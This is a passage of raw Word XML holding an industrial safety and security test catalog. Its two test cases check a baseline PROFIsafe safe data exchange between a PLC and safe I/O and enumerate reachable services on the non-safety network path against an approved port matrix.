    <w:p w14:paraId="34924931" w14:textId="77777777" w:rsidR="00991DBD" w:rsidRPr="006D5B99" w:rsidRDefault="00991DBD" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1D0A89" w14:textId="7B1BBFBE" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r w:rsidR="00635873" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80DB64" w14:textId="5FD3C309" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336D7AAC" w14:textId="6D3F166C" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ001-01</w:t>
      </w:r>
      <w:r w:rsidR="00D33B36" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00635873" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D33B36" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Baseline Safety Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BA8E8" w14:textId="47F0E2EB" w:rsidR="00635873" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00635873">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00635873" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00635873" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE43A5E" w14:textId="65D02F96" w:rsidR="00635873" w:rsidRPr="006D5B99"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35873" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC3088" w14:textId="75782077" w:rsidR="00635873" w:rsidRPr="006D5B99"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 CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635873" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8232FA" w14:textId="425B5CC8" w:rsidR="00635873" w:rsidRPr="006D5B99"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verification (reference baseline)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635873" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A041E94" w14:textId="69442989" w:rsidR="00635873" w:rsidRPr="006D5B99"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5905A3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005905A3" w:rsidP="00DB074F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CBB9CA4" w14:textId="6E9E2715" w:rsidR="005905A3" w:rsidRPr="006D5B99"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Show that with correct F_Dest_Add and valid CRC the consumer exchanges cyclic data, qualifier=good, DO follows the control byte, no passivation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005905A3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00557B41" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0141F38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Configure controller with matching F_Dest_Add; establish safe connection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A271A40" w14:textId="77777777" w:rsidR="00D95FF1"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Toggle a safe input and command a safe output.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79FE5D87" w14:textId="2926F9E8" w:rsidR="005905A3" w:rsidRPr="006D5B99"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qualifier + DO read-back over a sustained interval.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005905A3" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00557B41" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EFA4A87" w14:textId="77777777" w:rsidR="006A2F66"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qualifier remains good throughout, outputs mirror the commanded control data, and no passivation occurs under nominal conditions. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B4BA255" w14:textId="306E352A" w:rsidR="005905A3" w:rsidRPr="006D5B99"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qualifier becomes bad, or any output/command mismatch is observed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="301E877A" w14:textId="77777777" w:rsidR="00184056" w:rsidRPr="006D5B99" w:rsidRDefault="00184056" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF67C1F" w14:textId="1966C518" w:rsidR="00DF51C0" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DF51C0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00DF51C0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00DF51C0" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C98668" w14:textId="77777777" w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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F51C0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00ED175D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3496EEA0" w14:textId="77777777" w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>TC-RQ001-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CBDEED" w14:textId="0FD66F2C" w:rsidR="00DF51C0" w:rsidRPr="006D5B99" w:rsidRDefault="00421D3A" w:rsidP="00421D3A">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TIA laptop against PLC and SRIO </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="339CBBF7" w14:textId="39001DC1" w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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TIA Online &amp; Diagnose; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E634DC" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F99EBC" w14:textId="5E64B18B" w:rsidR="006A7F41"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TIA watch table monitoring F-DI/F-DO value + PROFIsafe qualifier;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3274D62B" w14:textId="7D4B7DBE" w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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toggle DI button, command DO from PLC, record DO read-back.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF51C0" w:rsidRPr="006D5B99"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1901BB8A" w:rsidR="008C2697" w:rsidRPr="006D5B99" w:rsidRDefault="00C36F03" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Resul</w:t>
            </w:r>
            <w:r w:rsidR="0087138A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="295CF54A" w14:textId="390477A2" w:rsidR="00D31680" w:rsidRPr="006D5B99"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TIA watch table monitoring F-DI/F-DO value + PROFIsafe qualifier;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA1FBA9" w14:textId="3A232FD8" w:rsidR="00DF51C0" w:rsidRPr="006D5B99" w:rsidRDefault="00DF51C0" w:rsidP="00D31680">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r>
    </w:tbl>
    <w:p w14:paraId="14C91FCC" w14:textId="77777777" w:rsidR="00DC2191" w:rsidRPr="006D5B99" w:rsidRDefault="00DC2191" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D61A55" w14:textId="66577CC8" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBCD803" w14:textId="462F038E" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-02 </w:t>
      </w:r>
      <w:r w:rsidR="00105328" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA68F6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack-Surface Enumeration on the Non-Safety Path</w:t>
      </w:r>
      <w:r w:rsidR="00F4692D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7E095" w14:textId="7C0FB913" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00105328"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6C6D63C6"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28DCB86F" w14:textId="24EEBA7A" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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3A8BE7F" w14:textId="49187FE5" w:rsidR="001E7CE4" w:rsidRPr="006D5B99" w:rsidRDefault="00721AE4" w:rsidP="001E7CE4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Spoofing / Tampering </w:t>
            </w:r>
            <w:r w:rsidR="001E7CE4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001E7CE4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidR="001E7CE4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Domain Separation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DEE2CE" w14:textId="0BA0E309" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F6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6A2F66" w:rsidRPr="006D5B99"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E4B047D" w14:textId="1281AA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21AE4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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163034D" w14:textId="61E7643E" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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services a connecting device reaches on the non-safety path; compare to the approved port matrix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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152C8A4D"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the position of a connecting device, perform a full service/port discovery against the device.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C27540" w14:textId="77777777"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service and version identification on any responding port.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07190AD2" w14:textId="33B375C1" w:rsidR="00F07C1D"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Co</w:t>
            </w:r>
            <w:r w:rsidR="00B348A7" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>mpi</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>le the reachable-service list.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299C1411" w14:textId="66C0C359" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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the list against the approved design matrix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6062FFB9" w14:textId="77777777" w:rsidR="00C23A83"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only design-approved services are reachable. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C92C0C0" w14:textId="21112113" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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service outside the approved matrix is reachable. (Confidentiality of an exposed service is recorded as a </w:t>
            </w:r>
            <w:r w:rsidR="00436B74" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>defense</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-in-depth observation; EN 50742 FR4 target = none.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DB94133" w14:textId="77777777" w:rsidR="00105328" w:rsidRPr="006D5B99" w:rsidRDefault="00105328" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED200B9" w14:textId="09BFB871" w:rsidR="00664BBB" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00665600">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00664BBB"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6D5B99"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6D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F6CBEC4" w14:textId="77777777" w:rsidR="00664BBB" w:rsidRPr="006D5B99"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64BBB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A4EBE" w14:textId="3752D0FA" w:rsidR="00664BBB" w:rsidRPr="006D5B99"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6D5B99">
              <w:t>TC-RQ001-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00664BBB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00664BBB" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
